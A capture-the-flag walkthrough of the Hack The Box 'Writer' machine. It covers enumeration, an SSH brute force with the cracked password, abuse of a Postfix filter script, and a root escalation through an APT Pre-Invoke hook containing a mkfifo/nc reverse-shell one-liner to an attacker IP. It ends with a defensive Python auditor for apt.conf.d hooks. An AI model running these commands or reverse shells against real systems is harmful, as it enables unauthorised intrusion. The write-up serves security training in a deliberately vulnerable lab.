Hack_The_Box_Writeups

HackTheBox – Writer Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A -v -T4 -Pn 10.10.11.101

┌──(rootkali)-[/home/kali/Downloads]

└─# echo 10.10.11.101 writer.htb >> /etc/hosts

http://writer.htb/

┌──(rootkali)-[/home/kali/Downloads]

└─# wfuzz -w /usr/share/dirb/wordlists/big.txt -u http://writer.htb/FUZZ --hc 404 -t 200

http://writer.htb/administrative

Now SMB enumeration

┌──(rootkali)-[/home/kali/Downloads]

└─# smbmap -H writer.htb -R

┌──(rootkali)-[/home/kali/Downloads]

└─# rpcclient -U "" -N writer.htb

rpcclient $> help

rpcclient $> enumdomusers

rpcclient $> queryuser kyle

┌──(rootkali)-[/home/kali/Downloads]

└─# hydra -l kyle -P rockyou.txt ssh://writer.htb -VV -f -t 60 

Username: kyle

Password: marcoantonio

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh kyle@10.10.11.101

kyle@writer:/tmp$ find / -type f -group filter 2>/dev/null

kyle@writer:/tmp$ cat /etc/postfix/disclaimer

Going through the script: /etc/postfix/disclaimer belongs to the filter group that kyle is in, and Postfix runs it as a content filter on every mail it handles, so the obvious move is to add a reverse shell to it. The problem is that a cron job resets the script to its default state, so a modified copy left in place gets wiped before any mail happens to go through it. The fix is to make the window as short as possible: copy the modified script into place and, in the same command, trigger a mail so the filter executes it immediately. shell.py below sends that mail through the local Postfix on port 25.

Code: shell.py

import smtplib

# Local Postfix; any message handed to it goes through the disclaimer filter.
host = '127.0.0.1'
port = 25

sender_email = "kyle@writer.htb"
receiver_email = "kyle@writer.htb"

# Content is irrelevant; the filter runs on delivery regardless of the body.
message = """\
Subject: Hi there

Test_python_sender."""

server = None
try:
    server = smtplib.SMTP(host, port)
    server.ehlo()
    server.sendmail(sender_email, receiver_email, message)
except Exception as e:
    print(e)
finally:
    # Only close the session if the connection was actually opened.
    if server is not None:
        server.quit()

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 1234

kyle@writer:/tmp$ cp disclaimer /etc/postfix/disclaimer && python3 shell.py

john@writer:/var/spool/postfix$ cd /home/john/.ssh/

john@writer:/home/john/.ssh$ ls -lrt

john@writer:/home/john/.ssh$ cat id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# chmod 600 id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh john@10.10.11.101 -i id_rsa  

kyle@writer:/tmp$ find / -type d -group management 2>/dev/null

https://github.com/DominicBreuker/pspy

john@writer:~$ cd /tmp

john@writer:/tmp$ wget http://10.10.14.14:8000/pspy32

john@writer:/tmp$ chmod +x pspy32

john@writer:/tmp$ ./pspy32

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 9000

pspy shows root periodically running apt-get update from cron. APT executes every command listed under APT::Update::Pre-Invoke before it updates, and /etc/apt/apt.conf.d is writable by the management group john belongs to (the find -group management command above is how to locate it), so a fragment dropped there runs as root on the next cron tick. Start nc (or pwncat) on port 9000 in a new terminal, replace the IP with your own, write the fragment and wait a few seconds. The fragment must use apt's list syntax, APT::Update::Pre-Invoke {"command";};, and the FIFO path has to be spelled the same way throughout (/tmp/f) or the pipeline never connects back.

john@writer:/tmp$ cd /etc/apt/apt.conf.d/

john@writer:/etc/apt/apt.conf.d$ echo 'APT::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9000 >/tmp/f";};' > /etc/apt/apt.conf.d/shell
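The defender's side of this step, as an added example that is not part of the original walkthrough or of apt itself: a small Python audit that parses apt.conf.d fragments (flat `A::B::C {...};`, scoped `A { B { ... }; };` and plain `Name "value";` forms, with `//`, `#` and `/* */` comments), pulls out every Pre-Invoke/Post-Invoke hook whose value apt would execute as root, and checks whether the directory is group- or world-writable, which is what let john drop a file there. The sample fragments are constructed, and the hook key list and the function names (find_hooks, audit_directory, is_group_or_world_writable) are this example's own, not apt's.

```python
"""Audit apt.conf.d fragments for Pre-/Post-Invoke command hooks.

Added example for this walkthrough, not part of the original page or of apt.
The hook key list, sample fragments and function names are this example's own.
"""
import os
import re
import stat

# apt configuration keys whose values are commands apt runs as root.
# (Assumed complete enough for an audit; extend if you track other hook keys.)
HOOK_KEYS = {
    "apt::update::pre-invoke",
    "apt::update::post-invoke",
    "apt::update::post-invoke-success",
    "dpkg::pre-invoke",
    "dpkg::post-invoke",
    "dpkg::pre-install-pkgs",
}

# Tokens of the apt.conf syntax: comments, "quoted strings", { } ; and bare names.
# Whole '#' lines are skipped, so '#include' / '#clear' directives are ignored here.
_TOKEN = re.compile(r'''
    \s+ | //[^\n]* | \#[^\n]* | /\*.*?\*/    # whitespace and comments
  | "((?:[^"\\]|\\.)*)"                      # quoted string, group 1
  | ([{};])                                  # structural symbol, group 2
  | ([^\s{};"]+)                             # bare name such as APT::Update::Pre-Invoke, group 3
''', re.VERBOSE | re.DOTALL)


def tokenize(text):
    tokens = []
    for m in _TOKEN.finditer(text):
        if m.group(1) is not None:
            tokens.append(("str", m.group(1).replace('\\"', '"')))
        elif m.group(2):
            tokens.append(("sym", m.group(2)))
        elif m.group(3):
            tokens.append(("name", m.group(3)))
    return tokens


def _parse_items(tokens, i, scope, out):
    """Parse items from index i under `scope` until the closing '}'; return next index."""
    n = len(tokens)
    while i < n:
        kind, val = tokens[i]
        if kind == "sym" and val == "}":
            return i + 1
        if kind == "str":
            # bare string inside a block: one element of the list named `scope`
            out.append((scope, val))
            i += 1
        elif kind == "name":
            # tolerate a trailing ':' (Name: {...}) so such fragments are still reported
            key = (f"{scope}::{val}" if scope else val).rstrip(":")
            i += 1
            if i < n and tokens[i][0] == "str":          # Name "value";
                out.append((key, tokens[i][1]))
                i += 1
            elif i < n and tokens[i] == ("sym", "{"):     # Name { ... };
                i = _parse_items(tokens, i + 1, key, out)
        else:
            i += 1                                        # ';' separators, stray '{'
    return i


def parse(text):
    """Flatten an apt.conf fragment into (fully::qualified::key, value) pairs."""
    out = []
    _parse_items(tokenize(text), 0, "", out)
    return out


def find_hooks(text):
    """Return (key, command) for every entry whose value apt would execute."""
    return [(k, v) for k, v in parse(text) if k.lower() in HOOK_KEYS]


def is_group_or_world_writable(mode):
    """True if an st_mode grants write to group or other: the apt.conf.d red flag."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_directory(conf_dir="/etc/apt/apt.conf.d"):
    """Scan a real apt.conf.d; return (path, key, command, dir_writable) findings."""
    dir_writable = is_group_or_world_writable(os.stat(conf_dir).st_mode)
    findings = []
    with os.scandir(conf_dir) as it:
        entries = sorted(it, key=lambda e: e.name)
    for entry in entries:
        if entry.is_file():
            with open(entry.path, encoding="utf-8", errors="replace") as fh:
                for key, cmd in find_hooks(fh.read()):
                    findings.append((entry.path, key, cmd, dir_writable))
    return findings


# Constructed samples: a stock-looking fragment, the hook from this walkthrough, a scoped form.
SAMPLE_BENIGN = '''
// 20auto-upgrades
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";
'''
SAMPLE_HOOK = '''
APT::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9000 >/tmp/f";};
'''
SAMPLE_NESTED = '''
APT { Update { Post-Invoke {"/usr/local/sbin/mirror-sync";}; }; };
'''

if __name__ == "__main__":
    for sample in (SAMPLE_BENIGN, SAMPLE_HOOK, SAMPLE_NESTED):
        print(find_hooks(sample))
    if os.path.isdir("/etc/apt/apt.conf.d"):
        for path, key, cmd, writable in audit_directory():
            flag = "DIR WRITABLE BY GROUP/OTHER" if writable else "dir perms ok"
            print(f"{path}: {key} -> {cmd!r} [{flag}]")
```

Hooks by themselves are not proof of compromise (Ubuntu's update-notifier ships a legitimate DPkg::Post-Invoke one), so treat the command list as items to review; a group- or world-writable apt.conf.d, or a fragment owned by a non-root user, is the finding that actually matters.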

Hi, I'm saksham dixit
